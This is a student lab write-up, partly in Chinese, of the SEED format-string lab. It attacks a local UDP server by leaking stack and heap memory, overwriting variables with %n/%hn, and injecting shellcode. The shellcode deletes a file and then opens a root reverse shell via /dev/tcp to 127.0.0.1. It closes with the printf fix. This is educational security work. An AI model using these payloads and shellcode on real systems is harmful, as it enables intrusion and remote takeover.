Format-String
- Table of Contents
- Preparation
- Task 1: The Vulnerable Program
- Task 2: Understanding the Layout of the Stack
- Task 3: Crash the Program
- Task 4: Print Out the Server Program’s Memory
- Task 5: Change the Server Program’s Memory
- Task 6: Inject Malicious Code into the Server Program
- Task 7: Getting a Reverse Shell
- Task 8 Fix the problem
- Conclusion
Table of Contents
- Preparation
- Task 1: The Vulnerable Program
- Task 2: Understanding the Layout of the Stack
- Task 3: Crash the Program
- Task 4: Print Out the Server Program’s Memory
- Task 5: Change the Server Program’s Memory
- Task 6: Inject Malicious Code into the Server Program
- Task 7: Getting a Reverse Shell
- Task 8 Fix the problem
- Conclusion
Preparation
1. 什么是格式化字符串
1 | printf ("The magic number is: %d", 1911); |
试观察运行以上语句,会发现字符串”The magic number is: %d”中的格式符%d被参数(1911)替换,因此输出变成了“The magic number is: 1911”。 格式化字符串大致就是这么一回事啦。
除了表示十进制数的%d,还有不少其他形式的格式符,一起来认识一下吧~
格式符 | 含义 | 含义(英) | 传 |
---|---|---|---|
%d | 十进制数(int) | decimal | 值 |
%u | 无符号十进制数 (unsigned int) | unsigned decimal | 值 |
%x | 十六进制数 (unsigned int) | hexadecimal | 值 |
%s | 字符串 ((const) (unsigned) char *) | string | 引用(指针) |
%n | %n符号以前输入的字符数量 (* int) | number of bytes written so far | 引用(指针) |
( * %n的使用将在1.5节中做出说明)
2. 栈与格式化字符串
格式化函数的行为由格式化字符串控制,printf
函数从栈上取得参数。
1 | printf ("a has value %d, b has value %d, c is at address: %08x\n",a, b, &c); |
3. 如果参数数量不匹配
会发生什么? 如果只有一个不匹配会发生什么?
1 | printf ("a has value %d, b has value %d, c is at address: %08x\n",a, b); |
- 在上面的例子中格式字符串需要3个参数,但程序只提供了2个。
- 该程序能够通过编译么?
printf()
是一个参数长度可变函数。因此,仅仅看参数数量是看不出问题的。- 为了查出不匹配,编译器需要了解
printf()
的运行机制,然而编译器通常不做这类分析。 - 有些时候,格式字符串并不是一个常量字符串,它在程序运行期间生成(比如用户输入),因此,编译器无法发现不匹配。
- 那么
printf()
函数自身能检测到不匹配么?printf()
从栈上取得参数,如果格式字符串需要3个参数,它会从栈上取3个,除非栈被标记了边界,printf()
并不知道自己是否会用完提供的所有参数。- 既然没有那样的边界标记。
printf()
会持续从栈上抓取数据,在一个参数数量不匹配的例子中,它会抓取到一些不属于该函数调用到的数据。
- 如果有人特意准备数据让
printf()
抓取会发生什么呢?
4. 访问任意位置内存
- 我们需要得到一段数据的内存地址,但我们无法修改代码,供我们使用的只有格式字符串。
- 如果我们调用
printf(%s)
时没有指明内存地址, 那么目标地址就可以通过printf
函数,在栈上的任意位置获取。printf
函数维护一个初始栈指针,所以能够得到所有参数在栈中的位置 - 观察: 格式字符串位于栈上. 如果我们可以把目标地址编码进格式字符串,那样目标地址也会存在于栈上,在接下来的例子里,格式字符串将保存在栈上的缓冲区中。
1 | int main(int argc, char *argv[]) |
如果我们让
printf
函数得到格式字符串中的目标内存地址 (该地址也存在于栈上), 我们就可以访问该地址.1
printf ("\x10\x01\x48\x08 %x %x %x %x %s");
\x10\x01\x48\x08
是目标地址的四个字节, 在C语言中,\x10
告诉编译器将一个16进制数0x10
放于当前位置(占1字节)。如果去掉前缀\x10
就相当于两个ascii
字符1和0了,这就不是我们所期望的结果了。%x 导致栈指针向格式字符串的方向移动(参考第2节)
如图所示,我们使用四个%x来移动
printf
函数的栈指针到我们存储格式字符串的位置,一旦到了目标位置,我们使用%s来打印,它会打印位于地址0x10014808
的内容,因为是将其作为字符串来处理,所以会一直打印到结束符为止。user_input数组到传给
printf
函数参数的地址之间的栈空间不是为了printf
函数准备的。但是,因为程序本身存在格式字符串漏洞,所以printf
会把这段内存当作传入的参数来匹配%x。最大的挑战就是想方设法找出
printf
函数栈指针(函数取参地址)到user_input数组的这一段距离是多少,这段距离决定了你需要在%s之前输入多少个%x。
5. 在内存中写一个数字
%n: 该符号前输入的字符数量会被存储到对应的参数中去
1 | int i; |
- 数字5(**%n前的字符数量**)将会被写入i 中
- 运用同样的方法在访问任意地址内存的时候,我们可以将一个数字写入指定的内存中。只要将上一小节(1.4)的%s替换成%n就能够覆盖
0x10014808
的内容。 - 利用这个方法,攻击者可以做以下事情:
- 重写程序标识控制访问权限
- 重写栈或者函数等等的返回地址
- 然而,写入的值是由%n之前的字符数量决定的。真的有办法能够写入任意数值么?
- 用最古老的计数方式, 为了写1000,就填充1000个字符吧。
- 为了防止过长的格式字符串,我们可以使用一个宽度指定的格式指示器。(比如(%0数字x)就会左填充预期数量的0符号)
Task 1: The Vulnerable Program
1 | sudo sysctl -w kernel.randomize_va_space=0 |
Download program server.c
and compile it.
1 |
|
use command below:
1 | gcc -z execstack -o server server.c |
Ignore the warning.
1 | on the server VM |
Then you will find what you input in client will be output in server VM.
Task 2: Understanding the Layout of the Stack
Observe the assembly code of server
to find the return address of myprintf()
.
1 | objdump -d server>server.out |
This is assembly part of main, we can find the return address of myprintf()
is 0x0804872d
.
Then we need to find where the return address is stored in stack.
We can use %p
to print the stack, or we can use %.8x
instead.
When inputing %p
in client VM, it shows 0xbf9dfa10
, and when using %.8x
it shows bf9dfa10
. Both make sense.
So we use:
1 | %p|%p|%p|%p|%p|%p|%p|%p|%p|%p|%p|%p|%p|%p|%p|%p|%p|%p|%p|%p|%p|%p|%p|%p|%p|%p|%p|%p|%p|%p|%p|%p|%p|%p|%p|%p| |
Then we got:
1 | [11/21/19]seed@VM:~/.../formatString$ sudo ./server |
We can find that:
1 | (stack top) |
The distance between format string and the value of msg
is $8*4=32\ bytes$. And we got the address of msg
is 0xbffff0a0
, the value of msg
is 0xbffff0e0
. The we got the address of format string is 0xbffff0a0
- 32 = 0xbffff080
.
So,
Question 1: What are the memory addresses at the locations marked by ➊, ➋, and ➌?
The address of format string is
0xbffff080
;The address of return address of
myprintf()
is0xbffff0a0 - 4 = 0xbffff09c
The address of buff is
0xbffff0e0
(input value is the address of buff);
Question 2: What is the distance between the locations marked by ➊ and ➌?
The distance between 1 and 3 is
0x080-0x0e0=0x60=96 bytes
.
Task 3: Crash the Program
To crash the program, we have some tricks.
1 | %08x.%08x.%08x 打印的是接下来几个地址对应的地址 |
So we have noticed that there is a 0x3
in the stack, if we try to read it as address, it will crash the program.
type in the client VM:
1 | %s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s |
We made it.
Task 4: Print Out the Server Program’s Memory
Task 4-A: Stack Data
To print out the stack data, just type in %.8x
or %p
.
1 | %.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x| |
Task 4-B: Heap Data
To print out the value of the secret msg
, we need construct a payload use python. Since we already own its address, it’s easy to do so. **From above questions we have find the distance between stack pointer and buffer array is 96 bytes. We use 23 %p to move the stack pointer from its current position to the buffer array where stores our input(the address of secret message). The the 24-th one, the ‘%s’ indicates the printf()
function should print the content in the array as an address. So it will find the value in that address. **
1 | echo $(printf "\xc0\x87\x04\x08")%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%s | nc 127.0.0.1 9090 |
Note that most computers are small-endian machines.
Task 5: Change the Server Program’s Memory
Task 5-A: Change the value to a different value
In this sub-task, we need to change the content of the target
variable to something else. Your task is considered as a success if you can change it to a different value, regardless of what value it may be.
We have known that the address of target is 0x0804a040
1 | echo $(printf "\x40\xa0\x04\x08")%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%n > input5a |
Then we find the value of target was modified to
1 | The value of the 'target' variable (after): 0x000000b5 |
Task 5-B: Change the value to 0x500
In this sub-task, we need to change to the content of the target
variable to a specific value 0x500. Your task is considered as a success only if the variable’s value becomes 0x500.
0x500
-0xb3
= 1101, we need add 1101 characters before %p.
1 | echo $(printf "\x40\xa0\x04\x08")*********************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%n > input2 |
Output:
1 | @�*********************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************0xbffff0a00xb7fba0000x804871b0x30xbffff0e00xbffff6c80x804872d0xbffff0e00xbffff0b80x100x804864c0xb7e1b2cd0xb7fdb6290x100x30x82230002(nil)(nil)(nil)0x3bae00020x100007f(nil)(nil) |
Task 5-C: Change the value to 0xff990000
This sub-task is similar to the previous one, except that the target value is now a large number. Printing out this large number of characters may take hours.
The basic idea is to use %hn
, instead of %n, so we can modify a two-byte memory space, instead of four bytes. Printing out 216 characters does not take much time. We can break the memory space of the target variable into two blocks of memory, each having two bytes. We just need to set one block to 0xFF99
and set the other one to 0x0000
.
This means that in your attack, you need to provide two addresses in the format string. In format string attacks, changing the content of a memory space to a very small value is quite challenging (please explain why in the report); 0x00
is an extreme case. To achieve this goal, we need to use an overflow technique. The basic idea is that when we make a number larger than what the storage allows, only the lower part of the number will be stored (basically, there is an integer overflow).
For example, if the number 216 + 5 is stored in a 16-bit memory space, only 5 will be stored. Therefore, to get to zero, we just need to get the number to 216 = 65536.
In this sub-task, we need use %hn
to substitute %n
. It will modify half word. So to change the value to 0xff990000
, we need to modify it by 0xff99
and 0x0000
, but 0 is impossible, we should implement this by overflow.
The two address is 0x0804a040
and 0x0804a042
, we need change the first two bytes into 0x10000
, and use 0xff99
to cover the overflow 0x1
.
1 | echo $(printf "\x42\xa0\x04\x08\x22\x22\x22\x22\x40\xa0\x04\x08")%655069x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%hn%0103x%hn > input5c |
Output:
1 | bfb1e0e0b76e0000 804871b 3bfb1e120bfb1e708 804872dbfb1e120bfb1e0f8 10 804864cb75412cdb7701629 10 382230002 0 0 0eae60002 100007f 0 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000022222222 |
Task 6: Inject Malicious Code into the Server Program
In this task we need modify the return address to the shell code.
To get the offset, we need to push some nop(0x90)
into the buffer array and get the offset.
Using gdb
file, we get:
1 | the value of msg(the address of buf): 0xbfffe718 |
So we construct a payload:
1 | echo $(printf "\xbc\x6f\xff\xbf")%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%hn$(printf "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90") >input |
Then we find the nop
were injected in the area of 0xbfffe790
, we get the offset = 0xbfffe790-0xbfffe718=0x78
.
So we can modify the return address into 0xbffff0e0+0x78=bffff158
.
Use the same idea in Task 5-C, we need change the two-byte at 0xbffff09c
and the two-byte at 0xbffff09e
. It’s origin value is 0x0804872d
, we get 0xbfff-3*4-22*4=48963
, and 0xf158-0xbfff=12633
, Then we try to construct a payload below. Trying a few times and change the value of the second value into 12611, we succeed.
1 | echo $(printf "\x9e\xf0\xff\xbf\x11\x11\x11\x11\x9c\xf0\xff\xbf")%048963x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%hn%012611x%hn$(printf "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\\x31\xc0\x50\x68bash\x68////\x68/bin\x89\xe3\x31\xc0\x50\x68-ccc\x89\xe0\x31\xd2\x52\x68ile \x68/myf\x68/tmp\x68/rm \x68/bin\x89\xe2\x31\xc9\x51\x52\x50\x53\x89\xe1\x31\xd2\x31\xc0\xb0\x0b\xcd\x80") > input6 |
Output:
1 | [11/21/19]seed@VM:/tmp$ touch myfile |
Task 7: Getting a Reverse Shell
To get a reverse shell, all we need is change somewhere in the shell code.
We need to split /bin/bash -i > /dev/tcp/127.0.0.1/7070 0<&1 2>&1
and substitute code between line 1 and line 2,
that is:
1 | "\x31\xc0" // xorl %eax, %eax : eax = 0 |
We can split that command into:
1 | \x68/bin |
and then we get the payload:
1 | echo $(printf "\x9e\xf0\xff\xbf\x11\x11\x11\x11\x9c\xf0\xff\xbf")%048963x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%hn%012611x%hn$(printf "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\\x31\xc0\x50\x68bash\x68////\x68/bin\x89\xe3\x31\xc0\x50\x68-ccc\x89\xe0\x31\xd2\x52\x682>&1\x68<&1 \x6870 0\x681/70\x680.0.\x68127.\x68tcp/\x68dev/\x68 > /\x68h -i\x68/bas\x68/bin\x89\xe2\x31\xc9\x51\x52\x50\x53\x89\xe1\x31\xd2\x31\xc0\xb0\x0b\xcd\x80") > input7 |
Output:
1 | [11/21/19]seed@VM:~/.../formatString$ nc -l 7070 -v |
Now we have got the root shell!
Task 8 Fix the problem
Remember the warning message generated by the gcc
compiler? Please explain what it means. Please fix the vulnerability in the server program, and recompile it. Does the compiler warning go away? Do your attacks still work? You only need to try one of your attacks to see whether it still works or not.
change printf(msg);
into printf("%s", msg);
recompile that.
1 | cp server.c server2.c |
Then we find when we input %p%p%p
on client VM, it will no longer print out the stack.
1 | [11/21/19]seed@VM:~/.../formatString$ nc -u 127.0.0.1 9090 |
1 | [11/21/19]seed@VM:~/.../formatString$ cp server.c server2.c |
Conclusion
A good lab!!!!